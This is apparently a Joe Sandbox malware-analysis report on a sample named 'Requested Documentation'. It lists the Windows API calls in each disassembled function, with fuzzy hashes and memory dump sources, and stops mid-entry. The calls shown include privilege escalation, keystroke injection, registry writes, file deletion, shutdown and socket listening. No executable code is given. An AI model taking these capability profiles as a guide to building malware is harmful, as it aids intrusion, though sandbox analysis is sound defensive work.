                                                                              • Opcode Fuzzy Hash: db96b5ebb3f2e1f60c7afc6587aa08a57c5ff0810a95875adcd2bf4742e8d929
                                                                              • Instruction Fuzzy Hash: 9A93AF71A44219DBDF24CFA8C881BADB7B5FF58310F24C56AE945AB380E7749E81CB50
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 009848DF
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009BD665
                                                                              • IsIconic.USER32(?), ref: 009BD66E
                                                                              • ShowWindow.USER32(?,00000009), ref: 009BD67B
                                                                              • SetForegroundWindow.USER32(?), ref: 009BD685
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009BD69B
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009BD6A2
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BD6AE
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 009BD6BF
                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 009BD6C7
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 009BD6CF
                                                                              • SetForegroundWindow.USER32(?), ref: 009BD6D2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD6E7
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD6F2
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD6FC
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD701
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD70A
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD70F
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD719
                                                                              • keybd_event.USER32(00000012,00000000), ref: 009BD71E
                                                                              • SetForegroundWindow.USER32(?), ref: 009BD721
                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 009BD748
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: 44542af3a25613ae8cdde2b5f3d8f7b228a3911d7f7cd2a0ff3b0025ac444157
                                                                              • Instruction ID: aec49e8ae55e99c15a129c95676be8950d4e195672ddb2fc52ade6ea61eb0687
                                                                              • Opcode Fuzzy Hash: 44542af3a25613ae8cdde2b5f3d8f7b228a3911d7f7cd2a0ff3b0025ac444157
                                                                              • Instruction Fuzzy Hash: A2315871A4131CBEEB315BA19C89FBF7F6CEB44B60F104025FA04F61D1DA715902ABA1
                                                                              APIs
                                                                                • Part of subcall function 009D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
                                                                                • Part of subcall function 009D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
                                                                                • Part of subcall function 009D87E1: GetLastError.KERNEL32 ref: 009D8865
                                                                              • _memset.LIBCMT ref: 009D8353
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009D83A5
                                                                              • CloseHandle.KERNEL32(?), ref: 009D83B6
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009D83CD
                                                                              • GetProcessWindowStation.USER32 ref: 009D83E6
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 009D83F0
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009D840A
                                                                                • Part of subcall function 009D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8309), ref: 009D81E0
                                                                                • Part of subcall function 009D81CB: CloseHandle.KERNEL32(?,?,009D8309), ref: 009D81F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: 573245b6af9328f8075c999709f905f3e6d80929fe45a0d55ab6d847affd4034
                                                                              • Instruction ID: f4c78fde772f585e14f5e972ed11679364efe57a599b6a2a4749f62d52e1a1eb
                                                                              • Opcode Fuzzy Hash: 573245b6af9328f8075c999709f905f3e6d80929fe45a0d55ab6d847affd4034
                                                                              • Instruction Fuzzy Hash: 258149B1940249AFDF11DFA4DC45AEFBB78EF04304F1481AAF914A6262DB318A16DB60
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009EC78D
                                                                              • FindClose.KERNEL32(00000000), ref: 009EC7E1
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009EC806
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009EC81D
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 009EC844
                                                                              • __swprintf.LIBCMT ref: 009EC890
                                                                              • __swprintf.LIBCMT ref: 009EC8D3
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • __swprintf.LIBCMT ref: 009EC927
                                                                                • Part of subcall function 009A3698: __woutput_l.LIBCMT ref: 009A36F1
                                                                              • __swprintf.LIBCMT ref: 009EC975
                                                                                • Part of subcall function 009A3698: __flsbuf.LIBCMT ref: 009A3713
                                                                                • Part of subcall function 009A3698: __flsbuf.LIBCMT ref: 009A372B
                                                                              • __swprintf.LIBCMT ref: 009EC9C4
                                                                              • __swprintf.LIBCMT ref: 009ECA13
                                                                              • __swprintf.LIBCMT ref: 009ECA62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 3953360268-2428617273
                                                                              • Opcode ID: 62b46aad96f801444e0d0e5216c180a1dd8a3b573ad22c9d71e26fb82c4e75dc
                                                                              • Instruction ID: ae87b6ca1fe660e957fa02926dd9a3a3cab336a03a778b31e5b513f0d1e3ac5f
                                                                              • Opcode Fuzzy Hash: 62b46aad96f801444e0d0e5216c180a1dd8a3b573ad22c9d71e26fb82c4e75dc
                                                                              • Instruction Fuzzy Hash: 41A13CB1408344ABC750FFA4C886EBFB7ECBFD8704F440919F59596291EA34DA09CB62
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EEFB6
                                                                              • _wcscmp.LIBCMT ref: 009EEFCB
                                                                              • _wcscmp.LIBCMT ref: 009EEFE2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009EEFF4
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 009EF00E
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009EF026
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF031
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 009EF04D
                                                                              • _wcscmp.LIBCMT ref: 009EF074
                                                                              • _wcscmp.LIBCMT ref: 009EF08B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EF09D
                                                                              • SetCurrentDirectoryW.KERNEL32(00A38920), ref: 009EF0BB
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF0C5
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF0D2
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF0E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: 840a5a8497ab773ef5b19cdf929117b2de68c5d416528ba3d8830de7a1203e11
                                                                              • Instruction ID: 09ab7d8adc5c107f4a6bc89f3c24896b86c62a3c79f3eb09a9c155b034524b8e
                                                                              • Opcode Fuzzy Hash: 840a5a8497ab773ef5b19cdf929117b2de68c5d416528ba3d8830de7a1203e11
                                                                              • Instruction Fuzzy Hash: DC31C03250124C7ECB25EBA5EC58BEE77ACAF49361F104576F804E2091DB74DE46CA61
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00953
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A0F910,00000000,?,00000000,?,?), ref: 00A009C1
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A00A09
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A00A92
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A00DB2
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A00DBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: 1c973e098d1cc5fdd80d2e1dab931715f3396182eee0feec1a3c7639230be93e
                                                                              • Instruction ID: 4f98e14445f76cb9cfaa2fb9683c61fdcbe37d7c4b180b12bb216cccfd22df10
                                                                              • Opcode Fuzzy Hash: 1c973e098d1cc5fdd80d2e1dab931715f3396182eee0feec1a3c7639230be93e
                                                                              • Instruction Fuzzy Hash: 7B0225756006059FCB14EF28D891F2AB7E5BF89314F04885CF88A9B3A2DB30ED45CB91
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EF113
                                                                              • _wcscmp.LIBCMT ref: 009EF128
                                                                              • _wcscmp.LIBCMT ref: 009EF13F
                                                                                • Part of subcall function 009E4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009E43A0
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009EF16E
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF179
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 009EF195
                                                                              • _wcscmp.LIBCMT ref: 009EF1BC
                                                                              • _wcscmp.LIBCMT ref: 009EF1D3
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009EF1E5
                                                                              • SetCurrentDirectoryW.KERNEL32(00A38920), ref: 009EF203
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF20D
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF21A
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF22C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009EA20F
                                                                              • __swprintf.LIBCMT ref: 009EA231
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 009EA26E
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009EA293
                                                                              • _memset.LIBCMT ref: 009EA2B2
                                                                              • _wcsncpy.LIBCMT ref: 009EA2EE
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009EA323
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009EA32E
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 009EA337
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009EA341
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              APIs
                                                                                • Part of subcall function 009D8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D821E
                                                                                • Part of subcall function 009D8202: GetLastError.KERNEL32(?,009D7CE2,?,?,?), ref: 009D8228
                                                                                • Part of subcall function 009D8202: GetProcessHeap.KERNEL32(00000008,?,?,009D7CE2,?,?,?), ref: 009D8237
                                                                                • Part of subcall function 009D8202: HeapAlloc.KERNEL32(00000000,?,009D7CE2,?,?,?), ref: 009D823E
                                                                                • Part of subcall function 009D8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D8255
                                                                                • Part of subcall function 009D829F: GetProcessHeap.KERNEL32(00000008,009D7CF8,00000000,00000000,?,009D7CF8,?), ref: 009D82AB
                                                                                • Part of subcall function 009D829F: HeapAlloc.KERNEL32(00000000,?,009D7CF8,?), ref: 009D82B2
                                                                                • Part of subcall function 009D829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D7CF8,?), ref: 009D82C3
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D7D13
                                                                              • _memset.LIBCMT ref: 009D7D28
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D7D47
                                                                              • GetLengthSid.ADVAPI32(?), ref: 009D7D58
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 009D7D95
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D7DB1
                                                                              • GetLengthSid.ADVAPI32(?), ref: 009D7DCE
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D7DDD
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 009D7DE4
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D7E05
                                                                              • CopySid.ADVAPI32(00000000), ref: 009D7E0C
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D7E3D
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D7E63
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D7E77
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                              • API String ID: 0-4052911093
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 009E0097
                                                                              • SetKeyboardState.USER32(?), ref: 009E0102
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 009E0122
                                                                              • GetKeyState.USER32(000000A0), ref: 009E0139
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 009E0168
                                                                              • GetKeyState.USER32(000000A1), ref: 009E0179
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 009E01A5
                                                                              • GetKeyState.USER32(00000011), ref: 009E01B3
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 009E01DC
                                                                              • GetKeyState.USER32(00000012), ref: 009E01EA
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 009E0213
                                                                              • GetKeyState.USER32(0000005B), ref: 009E0221
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              APIs
                                                                                • Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A004AC
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A0054B
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A005E3
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A00822
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A0082F
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              APIs
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                                • Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009E38A3
                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 009E394B
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009E395E
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009E397B
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009E399D
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009E39B9
                                                                              Similarity
                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                              • String ID: \*.*
                                                                              • API String ID: 4002782344-1173974218
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009EF440
                                                                              • Sleep.KERNEL32(0000000A), ref: 009EF470
                                                                              • _wcscmp.LIBCMT ref: 009EF484
                                                                              • _wcscmp.LIBCMT ref: 009EF49F
                                                                              • FindNextFileW.KERNEL32(?,?), ref: 009EF53D
                                                                              • FindClose.KERNEL32(00000000), ref: 009EF553
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                              • String ID: *.*
                                                                              • API String ID: 713712311-438819550
                                                                              • Opcode ID: a09fceba5ddf2e44c28fca3460388d64760bb9de88e97025b9d33a2f683a94f5
                                                                              • Instruction ID: 50fc6ac675242649ec2c438622b366c115433f462f4de9d957b345143a434107
                                                                              • Opcode Fuzzy Hash: a09fceba5ddf2e44c28fca3460388d64760bb9de88e97025b9d33a2f683a94f5
                                                                              • Instruction Fuzzy Hash: 7F417B7190424AAFCF11EFA4DC59AEEBBB8FF55310F104466F815A3291EB309E49CB90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 981e7e6059c8352013a318e966f71d704b83d97080c8abbbf4b3fa08ba683426
                                                                              • Instruction ID: a274b56c264af1ce8fa01417b17965fa974ac9511ed1dc745d187e606dab9ffc
                                                                              • Opcode Fuzzy Hash: 981e7e6059c8352013a318e966f71d704b83d97080c8abbbf4b3fa08ba683426
                                                                              • Instruction Fuzzy Hash: 54126D70A00609DFDF04DFA9D985AEEB7F5FF88310F608529E446E7250EB36A915CB50
                                                                              APIs
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                                • Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009E3B89
                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 009E3BD9
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009E3BEA
                                                                              • FindClose.KERNEL32(00000000), ref: 009E3C01
                                                                              • FindClose.KERNEL32(00000000), ref: 009E3C0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                              • String ID: \*.*
                                                                              • API String ID: 2649000838-1173974218
                                                                              • Opcode ID: 66fa1ba3b1ab8a1edf580ac17e4d7e8e6202eef79f4144752b5ec59e17172173
                                                                              • Instruction ID: 5db6f6f766cac809ad9d127d6b4d3e67d2b5bbfe1f215acbac329131f52c58b8
                                                                              • Opcode Fuzzy Hash: 66fa1ba3b1ab8a1edf580ac17e4d7e8e6202eef79f4144752b5ec59e17172173
                                                                              • Instruction Fuzzy Hash: C4314B71008385AFC601FF64D8959AFBBA8BE95314F444E2DF8D593291EB21DE09CB63
                                                                              APIs
                                                                                • Part of subcall function 009D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
                                                                                • Part of subcall function 009D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
                                                                                • Part of subcall function 009D87E1: GetLastError.KERNEL32 ref: 009D8865
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 009E51F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 96ff13da7f7f058830c792eb5acf52e2eefadeb5a680b7b23b12b7119e7aad75
                                                                              • Instruction ID: c333c794b8982b95ac4931be231ddaf02ca5d29687f699d66f12a2fdebf117a5
                                                                              • Opcode Fuzzy Hash: 96ff13da7f7f058830c792eb5acf52e2eefadeb5a680b7b23b12b7119e7aad75
                                                                              • Instruction Fuzzy Hash: 330170357956466FF73A52659C8AFBB725CD708358F120821FA23E22C3D9501C018190
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009F62DC
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F62EB
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 009F6307
                                                                              • listen.WSOCK32(00000000,00000005), ref: 009F6316
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F6330
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 009F6344
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
